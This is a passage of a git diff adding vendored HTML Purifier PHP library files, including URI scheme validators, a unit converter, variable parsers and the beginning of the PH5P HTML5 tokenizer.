'i' || $typecode === 'd') { + $type_ret = ";type=$typecode"; + } + } else { + $uri->path .= '%3B' . $type; + } + $uri->path = str_replace(';', '%3B', $uri->path); + $uri->path .= $type_ret; + } + + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIScheme/http.php b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/http.php new file mode 100644 index 000000000..959b8daff --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/http.php @@ -0,0 +1,19 @@ +<?php + +/** + * Validates http (HyperText Transfer Protocol) as defined by RFC 2616 + */ +class HTMLPurifier_URIScheme_http extends HTMLPurifier_URIScheme { + + public $default_port = 80; + public $browsable = true; + public $hierarchical = true; + + public function doValidate(&$uri, $config, $context) { + $uri->userinfo = null; + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIScheme/https.php b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/https.php new file mode 100644 index 000000000..159c2874e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/https.php @@ -0,0 +1,13 @@ +<?php + +/** + * Validates https (Secure HTTP) according to http scheme. + */ +class HTMLPurifier_URIScheme_https extends HTMLPurifier_URIScheme_http { + + public $default_port = 443; + public $secure = true; + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIScheme/mailto.php b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/mailto.php new file mode 100644 index 000000000..9db4cb23f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/mailto.php @@ -0,0 +1,27 @@ +<?php + +// VERY RELAXED! Shouldn't cause problems, not even Firefox checks if the +// email is valid, but be careful! + +/** + * Validates mailto (for E-mail) according to RFC 2368 + * @todo Validate the email address + * @todo Filter allowed query parameters + */ + +class HTMLPurifier_URIScheme_mailto extends HTMLPurifier_URIScheme { + + public $browsable = false; + public $may_omit_host = true; + + public function doValidate(&$uri, $config, $context) { + $uri->userinfo = null; + $uri->host = null; + $uri->port = null; + // we need to validate path against RFC 2368's addr-spec + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIScheme/news.php b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/news.php new file mode 100644 index 000000000..84a6748d8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/news.php @@ -0,0 +1,22 @@ +<?php + +/** + * Validates news (Usenet) as defined by generic RFC 1738 + */ +class HTMLPurifier_URIScheme_news extends HTMLPurifier_URIScheme { + + public $browsable = false; + public $may_omit_host = true; + + public function doValidate(&$uri, $config, $context) { + $uri->userinfo = null; + $uri->host = null; + $uri->port = null; + $uri->query = null; + // typecode check needed on path + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URIScheme/nntp.php b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/nntp.php new file mode 100644 index 000000000..4ccea0dfc --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URIScheme/nntp.php @@ -0,0 +1,19 @@ +<?php + +/** + * Validates nntp (Network News Transfer Protocol) as defined by generic RFC 1738 + */ +class HTMLPurifier_URIScheme_nntp extends HTMLPurifier_URIScheme { + + public $default_port = 119; + public $browsable = false; + + public function doValidate(&$uri, $config, $context) { + $uri->userinfo = null; + $uri->query = null; + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/URISchemeRegistry.php b/lib/htmlpurifier/library/HTMLPurifier/URISchemeRegistry.php new file mode 100644 index 000000000..576bf7b6d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/URISchemeRegistry.php @@ -0,0 +1,68 @@ +<?php + +/** + * Registry for retrieving specific URI scheme validator objects. + */ +class HTMLPurifier_URISchemeRegistry +{ + + /** + * Retrieve sole instance of the registry. + * @param $prototype Optional prototype to overload sole instance with, + * or bool true to reset to default registry. + * @note Pass a registry object $prototype with a compatible interface and + * the function will copy it and return it all further times. + */ + public static function instance($prototype = null) { + static $instance = null; + if ($prototype !== null) { + $instance = $prototype; + } elseif ($instance === null || $prototype == true) { + $instance = new HTMLPurifier_URISchemeRegistry(); + } + return $instance; + } + + /** + * Cache of retrieved schemes. + */ + protected $schemes = array(); + + /** + * Retrieves a scheme validator object + * @param $scheme String scheme name like http or mailto + * @param $config HTMLPurifier_Config object + * @param $config HTMLPurifier_Context object + */ + public function getScheme($scheme, $config, $context) { + if (!$config) $config = HTMLPurifier_Config::createDefault(); + + // important, otherwise attacker could include arbitrary file + $allowed_schemes = $config->get('URI.AllowedSchemes'); + if (!$config->get('URI.OverrideAllowedSchemes') && + !isset($allowed_schemes[$scheme]) + ) { + return; + } + + if (isset($this->schemes[$scheme])) return $this->schemes[$scheme]; + if (!isset($allowed_schemes[$scheme])) return; + + $class = 'HTMLPurifier_URIScheme_' . $scheme; + if (!class_exists($class)) return; + $this->schemes[$scheme] = new $class(); + return $this->schemes[$scheme]; + } + + /** + * Registers a custom scheme to the cache, bypassing reflection. + * @param $scheme Scheme name + * @param $scheme_obj HTMLPurifier_URIScheme object + */ + public function register($scheme, $scheme_obj) { + $this->schemes[$scheme] = $scheme_obj; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/UnitConverter.php b/lib/htmlpurifier/library/HTMLPurifier/UnitConverter.php new file mode 100644 index 000000000..545d42622 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/UnitConverter.php @@ -0,0 +1,254 @@ +<?php + +/** + * Class for converting between different unit-lengths as specified by + * CSS. + */ +class HTMLPurifier_UnitConverter +{ + + const ENGLISH = 1; + const METRIC = 2; + const DIGITAL = 3; + + /** + * Units information array. Units are grouped into measuring systems + * (English, Metric), and are assigned an integer representing + * the conversion factor between that unit and the smallest unit in + * the system. Numeric indexes are actually magical constants that + * encode conversion data from one system to the next, with a O(n^2) + * constraint on memory (this is generally not a problem, since + * the number of measuring systems is small.) + */ + protected static $units = array( + self::ENGLISH => array( + 'px' => 3, // This is as per CSS 2.1 and Firefox. Your mileage may vary + 'pt' => 4, + 'pc' => 48, + 'in' => 288, + self::METRIC => array('pt', '0.352777778', 'mm'), + ), + self::METRIC => array( + 'mm' => 1, + 'cm' => 10, + self::ENGLISH => array('mm', '2.83464567', 'pt'), + ), + ); + + /** + * Minimum bcmath precision for output. + */ + protected $outputPrecision; + + /** + * Bcmath precision for internal calculations. + */ + protected $internalPrecision; + + /** + * Whether or not BCMath is available + */ + private $bcmath; + + public function __construct($output_precision = 4, $internal_precision = 10, $force_no_bcmath = false) { + $this->outputPrecision = $output_precision; + $this->internalPrecision = $internal_precision; + $this->bcmath = !$force_no_bcmath && function_exists('bcmul'); + } + + /** + * Converts a length object of one unit into another unit. + * @param HTMLPurifier_Length $length + * Instance of HTMLPurifier_Length to convert. You must validate() + * it before passing it here! + * @param string $to_unit + * Unit to convert to. + * @note + * About precision: This conversion function pays very special + * attention to the incoming precision of values and attempts + * to maintain a number of significant figure. Results are + * fairly accurate up to nine digits. Some caveats: + * - If a number is zero-padded as a result of this significant + * figure tracking, the zeroes will be eliminated. + * - If a number contains less than four sigfigs ($outputPrecision) + * and this causes some decimals to be excluded, those + * decimals will be added on. + */ + public function convert($length, $to_unit) { + + if (!$length->isValid()) return false; + + $n = $length->getN(); + $unit = $length->getUnit(); + + if ($n === '0' || $unit === false) { + return new HTMLPurifier_Length('0', false); + } + + $state = $dest_state = false; + foreach (self::$units as $k => $x) { + if (isset($x[$unit])) $state = $k; + if (isset($x[$to_unit])) $dest_state = $k; + } + if (!$state || !$dest_state) return false; + + // Some calculations about the initial precision of the number; + // this will be useful when we need to do final rounding. + $sigfigs = $this->getSigFigs($n); + if ($sigfigs < $this->outputPrecision) $sigfigs = $this->outputPrecision; + + // BCMath's internal precision deals only with decimals. Use + // our default if the initial number has no decimals, or increase + // it by how ever many decimals, thus, the number of guard digits + // will always be greater than or equal to internalPrecision. + $log = (int) floor(log(abs($n), 10)); + $cp = ($log < 0) ? $this->internalPrecision - $log : $this->internalPrecision; // internal precision + + for ($i = 0; $i < 2; $i++) { + + // Determine what unit IN THIS SYSTEM we need to convert to + if ($dest_state === $state) { + // Simple conversion + $dest_unit = $to_unit; + } else { + // Convert to the smallest unit, pending a system shift + $dest_unit = self::$units[$state][$dest_state][0]; + } + + // Do the conversion if necessary + if ($dest_unit !== $unit) { + $factor = $this->div(self::$units[$state][$unit], self::$units[$state][$dest_unit], $cp); + $n = $this->mul($n, $factor, $cp); + $unit = $dest_unit; + } + + // Output was zero, so bail out early. Shouldn't ever happen. + if ($n === '') { + $n = '0'; + $unit = $to_unit; + break; + } + + // It was a simple conversion, so bail out + if ($dest_state === $state) { + break; + } + + if ($i !== 0) { + // Conversion failed! Apparently, the system we forwarded + // to didn't have this unit. This should never happen! + return false; + } + + // Pre-condition: $i == 0 + + // Perform conversion to next system of units + $n = $this->mul($n, self::$units[$state][$dest_state][1], $cp); + $unit = self::$units[$state][$dest_state][2]; + $state = $dest_state; + + // One more loop around to convert the unit in the new system. + + } + + // Post-condition: $unit == $to_unit + if ($unit !== $to_unit) return false; + + // Useful for debugging: + //echo "<pre>n"; + //echo "$n\nsigfigs = $sigfigs\nnew_log = $new_log\nlog = $log\nrp = $rp\n</pre>\n"; + + $n = $this->round($n, $sigfigs); + if (strpos($n, '.') !== false) $n = rtrim($n, '0'); + $n = rtrim($n, '.'); + + return new HTMLPurifier_Length($n, $unit); + } + + /** + * Returns the number of significant figures in a string number. + * @param string $n Decimal number + * @return int number of sigfigs + */ + public function getSigFigs($n) { + $n = ltrim($n, '0+-'); + $dp = strpos($n, '.'); // decimal position + if ($dp === false) { + $sigfigs = strlen(rtrim($n, '0')); + } else { + $sigfigs = strlen(ltrim($n, '0.')); // eliminate extra decimal character + if ($dp !== 0) $sigfigs--; + } + return $sigfigs; + } + + /** + * Adds two numbers, using arbitrary precision when available. + */ + private function add($s1, $s2, $scale) { + if ($this->bcmath) return bcadd($s1, $s2, $scale); + else return $this->scale($s1 + $s2, $scale); + } + + /** + * Multiples two numbers, using arbitrary precision when available. + */ + private function mul($s1, $s2, $scale) { + if ($this->bcmath) return bcmul($s1, $s2, $scale); + else return $this->scale($s1 * $s2, $scale); + } + + /** + * Divides two numbers, using arbitrary precision when available. + */ + private function div($s1, $s2, $scale) { + if ($this->bcmath) return bcdiv($s1, $s2, $scale); + else return $this->scale($s1 / $s2, $scale); + } + + /** + * Rounds a number according to the number of sigfigs it should have, + * using arbitrary precision when available. + */ + private function round($n, $sigfigs) { + $new_log = (int) floor(log(abs($n), 10)); // Number of digits left of decimal - 1 + $rp = $sigfigs - $new_log - 1; // Number of decimal places needed + $neg = $n < 0 ? '-' : ''; // Negative sign + if ($this->bcmath) { + if ($rp >= 0) { + $n = bcadd($n, $neg . '0.' . str_repeat('0', $rp) . '5', $rp + 1); + $n = bcdiv($n, '1', $rp); + } else { + // This algorithm partially depends on the standardized + // form of numbers that comes out of bcmath. + $n = bcadd($n, $neg . '5' . str_repeat('0', $new_log - $sigfigs), 0); + $n = substr($n, 0, $sigfigs + strlen($neg)) . str_repeat('0', $new_log - $sigfigs + 1); + } + return $n; + } else { + return $this->scale(round($n, $sigfigs - $new_log - 1), $rp + 1); + } + } + + /** + * Scales a float to $scale digits right of decimal point, like BCMath. + */ + private function scale($r, $scale) { + if ($scale < 0) { + // The f sprintf type doesn't support negative numbers, so we + // need to cludge things manually. First get the string. + $r = sprintf('%.0f', (float) $r); + // Due to floating point precision loss, $r will more than likely + // look something like 4652999999999.9234. We grab one more digit + // than we need to precise from $r and then use that to round + // appropriately. + $precise = (string) round(substr($r, 0, strlen($r) + $scale), -1); + // Now we return it, truncating the zero that was rounded off. + return substr($precise, 0, -1) . str_repeat('0', -$scale + 1); + } + return sprintf('%.' . $scale . 'f', (float) $r); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/VarParser.php b/lib/htmlpurifier/library/HTMLPurifier/VarParser.php new file mode 100644 index 000000000..68e72ae86 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/VarParser.php @@ -0,0 +1,154 @@ +<?php + +/** + * Parses string representations into their corresponding native PHP + * variable type. The base implementation does a simple type-check. + */ +class HTMLPurifier_VarParser +{ + + const STRING = 1; + const ISTRING = 2; + const TEXT = 3; + const ITEXT = 4; + const INT = 5; + const FLOAT = 6; + const BOOL = 7; + const LOOKUP = 8; + const ALIST = 9; + const HASH = 10; + const MIXED = 11; + + /** + * Lookup table of allowed types. Mainly for backwards compatibility, but + * also convenient for transforming string type names to the integer constants. + */ + static public $types = array( + 'string' => self::STRING, + 'istring' => self::ISTRING, + 'text' => self::TEXT, + 'itext' => self::ITEXT, + 'int' => self::INT, + 'float' => self::FLOAT, + 'bool' => self::BOOL, + 'lookup' => self::LOOKUP, + 'list' => self::ALIST, + 'hash' => self::HASH, + 'mixed' => self::MIXED + ); + + /** + * Lookup table of types that are string, and can have aliases or + * allowed value lists. + */ + static public $stringTypes = array( + self::STRING => true, + self::ISTRING => true, + self::TEXT => true, + self::ITEXT => true, + ); + + /** + * Validate a variable according to type. Throws + * HTMLPurifier_VarParserException if invalid. + * It may return NULL as a valid type if $allow_null is true. + * + * @param $var Variable to validate + * @param $type Type of variable, see HTMLPurifier_VarParser->types + * @param $allow_null Whether or not to permit null as a value + * @return Validated and type-coerced variable + */ + final public function parse($var, $type, $allow_null = false) { + if (is_string($type)) { + if (!isset(HTMLPurifier_VarParser::$types[$type])) { + throw new HTMLPurifier_VarParserException("Invalid type '$type'"); + } else { + $type = HTMLPurifier_VarParser::$types[$type]; + } + } + $var = $this->parseImplementation($var, $type, $allow_null); + if ($allow_null && $var === null) return null; + // These are basic checks, to make sure nothing horribly wrong + // happened in our implementations. + switch ($type) { + case (self::STRING): + case (self::ISTRING): + case (self::TEXT): + case (self::ITEXT): + if (!is_string($var)) break; + if ($type == self::ISTRING || $type == self::ITEXT) $var = strtolower($var); + return $var; + case (self::INT): + if (!is_int($var)) break; + return $var; + case (self::FLOAT): + if (!is_float($var)) break; + return $var; + case (self::BOOL): + if (!is_bool($var)) break; + return $var; + case (self::LOOKUP): + case (self::ALIST): + case (self::HASH): + if (!is_array($var)) break; + if ($type === self::LOOKUP) { + foreach ($var as $k) if ($k !== true) $this->error('Lookup table contains value other than true'); + } elseif ($type === self::ALIST) { + $keys = array_keys($var); + if (array_keys($keys) !== $keys) $this->error('Indices for list are not uniform'); + } + return $var; + case (self::MIXED): + return $var; + default: + $this->errorInconsistent(get_class($this), $type); + } + $this->errorGeneric($var, $type); + } + + /** + * Actually implements the parsing. Base implementation is to not + * do anything to $var. Subclasses should overload this! + */ + protected function parseImplementation($var, $type, $allow_null) { + return $var; + } + + /** + * Throws an exception. + */ + protected function error($msg) { + throw new HTMLPurifier_VarParserException($msg); + } + + /** + * Throws an inconsistency exception. + * @note This should not ever be called. It would be called if we + * extend the allowed values of HTMLPurifier_VarParser without + * updating subclasses. + */ + protected function errorInconsistent($class, $type) { + throw new HTMLPurifier_Exception("Inconsistency in $class: ".HTMLPurifier_VarParser::getTypeName($type)." not implemented"); + } + + /** + * Generic error for if a type didn't work. + */ + protected function errorGeneric($var, $type) { + $vtype = gettype($var); + $this->error("Expected type ".HTMLPurifier_VarParser::getTypeName($type).", got $vtype"); + } + + static public function getTypeName($type) { + static $lookup; + if (!$lookup) { + // Lazy load the alternative lookup table + $lookup = array_flip(HTMLPurifier_VarParser::$types); + } + if (!isset($lookup[$type])) return 'unknown'; + return $lookup[$type]; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/VarParser/Flexible.php b/lib/htmlpurifier/library/HTMLPurifier/VarParser/Flexible.php new file mode 100644 index 000000000..21b87675a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/VarParser/Flexible.php @@ -0,0 +1,103 @@ +<?php + +/** + * Performs safe variable parsing based on types which can be used by + * users. This may not be able to represent all possible data inputs, + * however. + */ +class HTMLPurifier_VarParser_Flexible extends HTMLPurifier_VarParser +{ + + protected function parseImplementation($var, $type, $allow_null) { + if ($allow_null && $var === null) return null; + switch ($type) { + // Note: if code "breaks" from the switch, it triggers a generic + // exception to be thrown. Specific errors can be specifically + // done here. + case self::MIXED : + case self::ISTRING : + case self::STRING : + case self::TEXT : + case self::ITEXT : + return $var; + case self::INT : + if (is_string($var) && ctype_digit($var)) $var = (int) $var; + return $var; + case self::FLOAT : + if ((is_string($var) && is_numeric($var)) || is_int($var)) $var = (float) $var; + return $var; + case self::BOOL : + if (is_int($var) && ($var === 0 || $var === 1)) { + $var = (bool) $var; + } elseif (is_string($var)) { + if ($var == 'on' || $var == 'true' || $var == '1') { + $var = true; + } elseif ($var == 'off' || $var == 'false' || $var == '0') { + $var = false; + } else { + throw new HTMLPurifier_VarParserException("Unrecognized value '$var' for $type"); + } + } + return $var; + case self::ALIST : + case self::HASH : + case self::LOOKUP : + if (is_string($var)) { + // special case: technically, this is an array with + // a single empty string item, but having an empty + // array is more intuitive + if ($var == '') return array(); + if (strpos($var, "\n") === false && strpos($var, "\r") === false) { + // simplistic string to array method that only works + // for simple lists of tag names or alphanumeric characters + $var = explode(',',$var); + } else { + $var = preg_split('/(,|[\n\r]+)/', $var); + } + // remove spaces + foreach ($var as $i => $j) $var[$i] = trim($j); + if ($type === self::HASH) { + // key:value,key2:value2 + $nvar = array(); + foreach ($var as $keypair) { + $c = explode(':', $keypair, 2); + if (!isset($c[1])) continue; + $nvar[trim($c[0])] = trim($c[1]); + } + $var = $nvar; + } + } + if (!is_array($var)) break; + $keys = array_keys($var); + if ($keys === array_keys($keys)) { + if ($type == self::ALIST) return $var; + elseif ($type == self::LOOKUP) { + $new = array(); + foreach ($var as $key) { + $new[$key] = true; + } + return $new; + } else break; + } + if ($type === self::ALIST) { + trigger_error("Array list did not have consecutive integer indexes", E_USER_WARNING); + return array_values($var); + } + if ($type === self::LOOKUP) { + foreach ($var as $key => $value) { + if ($value !== true) { + trigger_error("Lookup array has non-true value at key '$key'; maybe your input array was not indexed numerically", E_USER_WARNING); + } + $var[$key] = true; + } + } + return $var; + default: + $this->errorInconsistent(__CLASS__, $type); + } + $this->errorGeneric($var, $type); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/VarParser/Native.php b/lib/htmlpurifier/library/HTMLPurifier/VarParser/Native.php new file mode 100644 index 000000000..b02a6de54 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/VarParser/Native.php @@ -0,0 +1,26 @@ +<?php + +/** + * This variable parser uses PHP's internal code engine. Because it does + * this, it can represent all inputs; however, it is dangerous and cannot + * be used by users. + */ +class HTMLPurifier_VarParser_Native extends HTMLPurifier_VarParser +{ + + protected function parseImplementation($var, $type, $allow_null) { + return $this->evalExpression($var); + } + + protected function evalExpression($expr) { + $var = null; + $result = eval("\$var = $expr;"); + if ($result === false) { + throw new HTMLPurifier_VarParserException("Fatal error in evaluated code"); + } + return $var; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/VarParserException.php b/lib/htmlpurifier/library/HTMLPurifier/VarParserException.php new file mode 100644 index 000000000..5df341495 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/VarParserException.php @@ -0,0 +1,11 @@ +<?php + +/** + * Exception type for HTMLPurifier_VarParser + */ +class HTMLPurifier_VarParserException extends HTMLPurifier_Exception +{ + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/.htaccess b/lib/htmlpurifier/maintenance/.htaccess new file mode 100644 index 000000000..3a4288278 --- /dev/null +++ b/lib/htmlpurifier/maintenance/.htaccess @@ -0,0 +1 @@ +Deny from all diff --git a/lib/htmlpurifier/maintenance/PH5P.php b/lib/htmlpurifier/maintenance/PH5P.php new file mode 100644 index 000000000..96d0d13f9 --- /dev/null +++ b/lib/htmlpurifier/maintenance/PH5P.php @@ -0,0 +1,3824 @@ +<?php +class HTML5 { + private $data; + private $char; + private $EOF; + private $state; + private $tree; + private $token; + private $content_model; + private $escape = false; + private $entities = array('AElig;','AElig','AMP;','AMP','Aacute;','Aacute', + 'Acirc;','Acirc','Agrave;','Agrave','Alpha;','Aring;','Aring','Atilde;', + 'Atilde','Auml;','Auml','Beta;','COPY;','COPY','Ccedil;','Ccedil','Chi;', + 'Dagger;','Delta;','ETH;','ETH','Eacute;','Eacute','Ecirc;','Ecirc','Egrave;', + 'Egrave','Epsilon;','Eta;','Euml;','Euml','GT;','GT','Gamma;','Iacute;', + 'Iacute','Icirc;','Icirc','Igrave;','Igrave','Iota;','Iuml;','Iuml','Kappa;', + 'LT;','LT','Lambda;','Mu;','Ntilde;','Ntilde','Nu;','OElig;','Oacute;', + 'Oacute','Ocirc;','Ocirc','Ograve;','Ograve','Omega;','Omicron;','Oslash;', + 'Oslash','Otilde;','Otilde','Ouml;','Ouml','Phi;','Pi;','Prime;','Psi;', + 'QUOT;','QUOT','REG;','REG','Rho;','Scaron;','Sigma;','THORN;','THORN', + 'TRADE;','Tau;','Theta;','Uacute;','Uacute','Ucirc;','Ucirc','Ugrave;', + 'Ugrave','Upsilon;','Uuml;','Uuml','Xi;','Yacute;','Yacute','Yuml;','Zeta;', + 'aacute;','aacute','acirc;','acirc','acute;','acute','aelig;','aelig', + 'agrave;','agrave','alefsym;','alpha;','amp;','amp','and;','ang;','apos;', + 'aring;','aring','asymp;','atilde;','atilde','auml;','auml','bdquo;','beta;', + 'brvbar;','brvbar','bull;','cap;','ccedil;','ccedil','cedil;','cedil', + 'cent;','cent','chi;','circ;','clubs;','cong;','copy;','copy','crarr;', + 'cup;','curren;','curren','dArr;','dagger;','darr;','deg;','deg','delta;', + 'diams;','divide;','divide','eacute;','eacute','ecirc;','ecirc','egrave;', + 'egrave','empty;','emsp;','ensp;','epsilon;','equiv;','eta;','eth;','eth', + 'euml;','euml','euro;','exist;','fnof;','forall;','frac12;','frac12', + 'frac14;','frac14','frac34;','frac34','frasl;','gamma;','ge;','gt;','gt', + 'hArr;','harr;','hearts;','hellip;','iacute;','iacute','icirc;','icirc', + 'iexcl;','iexcl','igrave;','igrave','image;','infin;','int;','iota;', + 'iquest;','iquest','isin;','iuml;','iuml','kappa;','lArr;','lambda;','lang;', + 'laquo;','laquo','larr;','lceil;','ldquo;','le;','lfloor;','lowast;','loz;', + 'lrm;','lsaquo;','lsquo;','lt;','lt','macr;','macr','mdash;','micro;','micro', + 'middot;','middot','minus;','mu;','nabla;','nbsp;','nbsp','ndash;','ne;', + 'ni;','not;','not','notin;','nsub;','ntilde;','ntilde','nu;','oacute;', + 'oacute','ocirc;','ocirc','oelig;','ograve;','ograve','oline;','omega;', + 'omicron;','oplus;','or;','ordf;','ordf','ordm;','ordm','oslash;','oslash', + 'otilde;','otilde','otimes;','ouml;','ouml','para;','para','part;','permil;', + 'perp;','phi;','pi;','piv;','plusmn;','plusmn','pound;','pound','prime;', + 'prod;','prop;','psi;','quot;','quot','rArr;','radic;','rang;','raquo;', + 'raquo','rarr;','rceil;','rdquo;','real;','reg;','reg','rfloor;','rho;', + 'rlm;','rsaquo;','rsquo;','sbquo;','scaron;','sdot;','sect;','sect','shy;', + 'shy','sigma;','sigmaf;','sim;','spades;','sub;','sube;','sum;','sup1;', + 'sup1','sup2;','sup2','sup3;','sup3','sup;','supe;','szlig;','szlig','tau;', + 'there4;','theta;','thetasym;','thinsp;','thorn;','thorn','tilde;','times;', + 'times','trade;','uArr;','uacute;','uacute','uarr;','ucirc;','ucirc', + 'ugrave;','ugrave','uml;','uml','upsih;','upsilon;','uuml;','uuml','weierp;', + 'xi;','yacute;','yacute','yen;','yen','yuml;','yuml','zeta;','zwj;','zwnj;'); + + const PCDATA = 0; + const RCDATA = 1; + const CDATA = 2; + const PLAINTEXT = 3; + + const DOCTYPE = 0; + const STARTTAG = 1; + const ENDTAG = 2; + const COMMENT = 3; + const CHARACTR = 4; + const EOF = 5; + + public function __construct($data) { + $data = str_replace("\r\n", "\n", $data); + $date = str_replace("\r", null, $data); + + $this->data = $data; + $this->char = -1; + $this->EOF = strlen($data); + $this->tree = new HTML5TreeConstructer; + $this->content_model = self::PCDATA; + + $this->state = 'data'; + + while($this->state !== null) { + $this->{$this->state.'State'}(); + } + } + + public function save() { + return $this->tree->save(); + } + + private function char() { + return ($this->char < $this->EOF) + ? $this->data[$this->char] + : false; + } + + private function character($s, $l = 0) { + if($s + $l < $this->EOF) { + if($l === 0) { + return $this->data[$s]; + } else { + return substr($this->data, $s, $l); + } + } + } + + private function characters($char_class, $start) { + return preg_replace('#^(['.$char_class.']+).*#s', '\\1', substr($this->data, $start)); + } + + private function dataState() { + // Consume the next input character + $this->char++; + $char = $this->char(); + + if($char === '&' && ($this->content_model === self::PCDATA || $this->content_model === self::RCDATA)) { + /* U+0026 AMPERSAND (&) + When the content model flag is set to one of the PCDATA or RCDATA + states: switch to the entity data state. Otherwise: treat it as per + the "anything else" entry below. */ + $this->state = 'entityData'; + + } elseif($char === '-') { + /* If the content model flag is set to either the RCDATA state or + the CDATA state, and the escape flag is false, and there are at + least three characters before this one in the input stream, and the + last four characters in the input stream, including this one, are + U+003C LESS-THAN SIGN, U+0021 EXCLAMATION MARK, U+002D HYPHEN-MINUS, + and U+002D HYPHEN-MINUS ("<!--"), then set the escape flag to true. */ + if(($this->content_model === self::RCDATA || $this->content_model === + self::CDATA) && $this->escape === false && + $this->char >= 3 && $this->character($this->char - 4, 4) === '<!--') { + $this->escape = true; + } + + /* In any case, emit the input character as a character token. Stay + in the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => $char + )); + + /* U+003C LESS-THAN SIGN (<) */ + } elseif($char === '<' && ($this->content_model === self::PCDATA || + (($this->content_model === self::RCDATA || + $this->content_model === self::CDATA) && $this->escape === false))) { + /* When the content model flag is set to the PCDATA state: switch + to the tag open state. + + When the content model flag is set to either the RCDATA state or + the CDATA state and the escape flag is false: switch to the tag + open state. + + Otherwise: treat it as per the "anything else" entry below. */ + $this->state = 'tagOpen'; + + /* U+003E GREATER-THAN SIGN (>) */ + } elseif($char === '>') { + /* If the content model flag is set to either the RCDATA state or + the CDATA state, and the escape flag is true, and the last three + characters in the input stream including this one are U+002D + HYPHEN-MINUS, U+002D HYPHEN-MINUS, U+003E GREATER-THAN SIGN ("-->"), + set the escape flag to false. */ + if(($this->content_model === self::RCDATA || + $this->content_model === self::CDATA) && $this->escape === true && + $this->character($this->char, 3) === '-->') { + $this->escape = false; + } + + /* In any case, emit the input character as a character token. + Stay in the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => $char + )); + + } elseif($this->char === $this->EOF) { + /* EOF + Emit an end-of-file token. */ + $this->EOF(); + + } elseif($this->content_model === self::PLAINTEXT) { + /* When the content model flag is set to the PLAINTEXT state + THIS DIFFERS GREATLY FROM THE SPEC: Get the remaining characters of + the text and emit it as a character token. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => substr($this->data, $this->char) + )); + + $this->EOF(); + + } else { + /* Anything else + THIS DIFFERS GREATLY FROM THE SPEC: Get as many character that + otherwise would also be treated as a character token and emit it + as a single character token. Stay in the data state. */ + $len = strcspn($this->data, '<&', $this->char); + $char = substr($this->data, $this->char, $len); + $this->char += $len - 1; + + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => $char + )); + + $this->state = 'data'; + } + } + + private function entityDataState() { + // Attempt to consume an entity. + $entity = $this->entity(); + + // If nothing is returned, emit a U+0026 AMPERSAND character token. + // Otherwise, emit the character token that was returned. + $char = (!$entity) ? '&' : $entity; + $this->emitToken($char); + + // Finally, switch to the data state. + $this->state = 'data'; + } + + private function tagOpenState() { + switch($this->content_model) { + case self::RCDATA: + case self::CDATA: + /* If the next input character is a U+002F SOLIDUS (/) character, + consume it and switch to the close tag open state. If the next + input character is not a U+002F SOLIDUS (/) character, emit a + U+003C LESS-THAN SIGN character token and switch to the data + state to process the next input character. */ + if($this->character($this->char + 1) === '/') { + $this->char++; + $this->state = 'closeTagOpen'; + + } else { + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '<' + )); + + $this->state = 'data'; + } + break; + + case self::PCDATA: + // If the content model flag is set to the PCDATA state + // Consume the next input character: + $this->char++; + $char = $this->char(); + + if($char === '!') { + /* U+0021 EXCLAMATION MARK (!) + Switch to the markup declaration open state. */ + $this->state = 'markupDeclarationOpen'; + + } elseif($char === '/') { + /* U+002F SOLIDUS (/) + Switch to the close tag open state. */ + $this->state = 'closeTagOpen'; + + } elseif(preg_match('/^[A-Za-z]$/', $char)) { + /* U+0041 LATIN LETTER A through to U+005A LATIN LETTER Z + Create a new start tag token, set its tag name to the lowercase + version of the input character (add 0x0020 to the character's code + point), then switch to the tag name state. (Don't emit the token + yet; further details will be filled in before it is emitted.) */ + $this->token = array( + 'name' => strtolower($char), + 'type' => self::STARTTAG, + 'attr' => array() + ); + + $this->state = 'tagName'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Parse error. Emit a U+003C LESS-THAN SIGN character token and a + U+003E GREATER-THAN SIGN character token. Switch to the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '<>' + )); + + $this->state = 'data'; + + } elseif($char === '?') { + /* U+003F QUESTION MARK (?) + Parse error. Switch to the bogus comment state. */ + $this->state = 'bogusComment'; + + } else { + /* Anything else + Parse error. Emit a U+003C LESS-THAN SIGN character token and + 